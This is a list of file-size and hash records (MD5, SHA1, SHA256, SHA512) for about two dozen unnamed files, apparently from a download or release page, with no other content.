Filesize: 4.1MB
MD5: 8f1b1942aae7b74e4788bea2e6a1e4d9
SHA1: 21ba2d7e561a4b4adf74abee9fe5ef0e1613aa2a
SHA256: 1a4c2556aeed26e40b7ea1cb61fee7943fa932739a8c6f6c871282442e548601
SHA512: 215f15c848fb56ceeb105db83504f605acc1c0b1b3d5a5c7f7cad24572e6f529da3099b805ed68f4e2ec6777731d680fad829cf96d50c821ddeee55e4e9bb39a

Filesize: 25.7MB
MD5: c313957dff0eef7ef2ed10878eb9c4a6
SHA1: 80eeb5aca5dce3b696a287d3242e9ad516104e4c
SHA256: 212c54ebc9610c9ad85eb7e56c4ac3042af773ce70887f5f31f3f3cf9ce65fd9
SHA512: 5648803f2c7454ee2d0a546224c78fd1f0924315e10d3e80b5b03d2c601c09f76a25d56f05db3c97b07ae95a0cd7a0dd3926cad88dd6555c67f91bfb19ab15df

Filesize: 44.3MB
MD5: 58fee94028a34957a491f209c2247897
SHA1: 6e1a606cf18d130d54c3c3d25320ec28fcdacdee
SHA256: f88d231aa94655ef82539a66d6d7630d64373e98ea949358ebe6bcb48f56b9bb
SHA512: d7eb5f345b687fe7edbe33febb473653fb820505e936e8eff25641a4061d0dd7abac0af27da8488c4448efe91c5dff0ad2c8f7718ce9f58e8fd0bf5054fa9677

Filesize: 3.3MB
MD5: f6c337d9952f63819a8085fc439e825b
SHA1: 2931f0a040b18dcc9515b6c91e4729e7bacbf0f0
SHA256: 209d1b1e2c89f1a154c4826f280836ca0feaff06105af0e0417679033bd619d0
SHA512: e281554c3b24b8869dd8cbb81d4e870e74b26cc7f66cde379a262f452f4a3c58d5e59509b0d143b47fd46e94f1bd000a897bf44f4507b3fe503f62b24f5a3882

Filesize: 343KB
MD5: 2b4ac7b362261cb3f6f9583751708064
SHA1: b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256: a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512: c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Filesize: 126KB
MD5: e8d45731654929413d79b3818d6a5011
SHA1: 23579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256: a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512: df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Filesize: 11KB
MD5: 2ae993a2ffec0c137eb51c8832691bcb
SHA1: 98e0b37b7c14890f8a599f35678af5e9435906e1
SHA256: 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA512: 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Filesize: 6KB
MD5: b648c78981c02c434d6a04d4422a6198
SHA1: 74d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA256: 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512: 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Filesize: 72KB
MD5: cbefa7108d0cf4186cdf3a82d6db80cd
SHA1: 73aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA256: 7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512: b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Filesize: 9.8MB
MD5: 540ec39c4d4f7b09766aff459270b9a7
SHA1: d5b2989511ce614fc18b1e399528b97cd1e80350
SHA256: c0cab3ec9b99b0038b4173c1a93f840c6205dbd516fc2d2577e8710b5f2b3d6f
SHA512: c419c631399f71d093d922d0c9773e599d4b90ea6b2fd913012d02178524d636fceb181289563e7b18523108f2d45eefadcd8e8804b13db3947497106329fbec

Filesize: 381KB
MD5: fd5efccde59e94eec8bb2735aa577b2b
SHA1: 51aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256: 441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA512: 74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Filesize: 1KB
MD5: bb855154a8b47369088d5cc7325b3b81
SHA1: f79640858309233565c70f5a27345dcd679b228c
SHA256: 57190d429cd46f342a255bc5a1fb3971d3eead6ba84e1bb61d2ff9693c772be0
SHA512: 003075d8f55760d37bbbe015a00aa2030ed9ab853d0595ef87755692eacfb6bf2dfe90662671a2d26f9f1ed5610e6e2e1529cd97a654eee8d3151efe7cf09e74

Filesize: 1KB
MD5: 90e82bbf6fd72cba4114d59ef2bfcdc4
SHA1: 9dd76ef9830f448f766857fad3d93382c847db9e
SHA256: eb332e6a886136ee6bf5d024e0d57191e34fe8f82061188efe2fce7b7e7eb9f5
SHA512: c81931b9c7acfd87862ec3c7bed04a0750c1f1e00ab43cef4cdbbd486c625731bd5bf1465dcb9359bd7a9d718bf47475e4ea60958781d53069b524999b2a208d

Filesize: 2KB
MD5: 267da13849ee66cf4ec2c7939d40d0f9
SHA1: 72166950f1bc71c4dbf4ae4b1fa5f27ca0a97caf
SHA256: 2c99c036d4ec14ae8ccb750af461e81f3b12a46845bccd27f87abd09b3b9c673
SHA512: 0e6ed3ca41f1be4f17282cc3ccfa7ea63bab09ec9fcb9a70aa30d8678e2d87b4dfb6d8df4ea5bcf46c9f749ff4e5089cd5c4404ec919f763051333dda12c927e

Filesize: 2KB
MD5: eafeaf10c3acf20888e39e9313fb883f
SHA1: 3f4459bd2dddc3ce1f6d8fab8c24b33bb4cce333
SHA256: b4cd7888d5798b44fd779d1d19f875161f54519602bd52ae73b65818797f364f
SHA512: 848909fa915fc74d5c63989397f0f561ecc7b41577492cf77c233c6d2f01c16aab9885da79790e7d527cec335bb95028ee714597c14c16a8c1910f1053c21144

Filesize: 3KB
MD5: 25ae7b338f59c66528e2831b6902faf8
SHA1: ed9c66cf2f7457fe6c5143df7653c4acbbddb823
SHA256: 85f6262a053aa14a10b8820a715d35246cd8298244def038aac420ca7308b499
SHA512: 0f5eb84a79c2a2344e54920644c4ba9810e614d528666efb2d0d93ecd024c180ad2319910e637925eeaf5be95c6edb39993e10c91087e83a64e7891b41246031

Filesize: 3KB
MD5: 5040a97c878388d19176e73f544eacc0
SHA1: 4f7aea500f2f91cd6b701d2e5c2a64fa55ab1654
SHA256: 53f12da74c7e4043f663cb9788a1b2c2d5f9b5021c59c898d67950a3bf9b45f8
SHA512: 5a3c87b02ae32a92f7f42f4a79a6aa922ca99e2b292f6d8e4340cb4d0cf34708465f12f6528346230611a238c8e94a1efd60f8de1c9bcd19f4cb430326eac926

Filesize: 3KB
MD5: ecc7e3918694a9c3d50f4f4305f205d7
SHA1: b47488a47c4257b8c055124702fdb6a115f0d0e9
SHA256: 3bf88bcd25cf578a2aff14fc1f11a28a3ecd11b1560f00a04333926f236087df
SHA512: a76c70f83cf458ae38f9549436b4f0fdf42010f6ab15127b88ebfd10be2d8e99e6fa509fc4d2a2495747e8067c81be8b2460883c2b3590ac638dd33b3e5bba0c

Filesize: 4KB
MD5: 37aadf59af32718f32837b1d7e2c9c73
SHA1: b7cf63a77d582b00b29ccffc3c21fc3f9f3a2394
SHA256: ad5fb7e4753156fb85f62bc7177be3c03c70fc1e9b0f5eac666f9685bbd727e0
SHA512: c04806be62b2421cfb1a1fc6af2cf09e6c57761c6f8b47ebc3799e4f7d83b9f3d57b36e00b05f02be8c57b4a961aad8d5e1950fc6b9023f93921630b9da3db47

Filesize: 332KB
MD5: ea774c81fe7b5d9708caa278cf3f3c68
SHA1: fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA256: 4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA512: 7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Filesize: 424KB
MD5: e9c001647c67e12666f27f9984778ad6
SHA1: 51961af0a52a2cc3ff2c4149f8d7011490051977
SHA256: 7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA512: 56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Filesize: 1KB
MD5: c838e174298c403c2bbdf3cb4bdbb597
SHA1: 70eeb7dfad9488f14351415800e67454e2b4b95b
SHA256: 1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512: c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376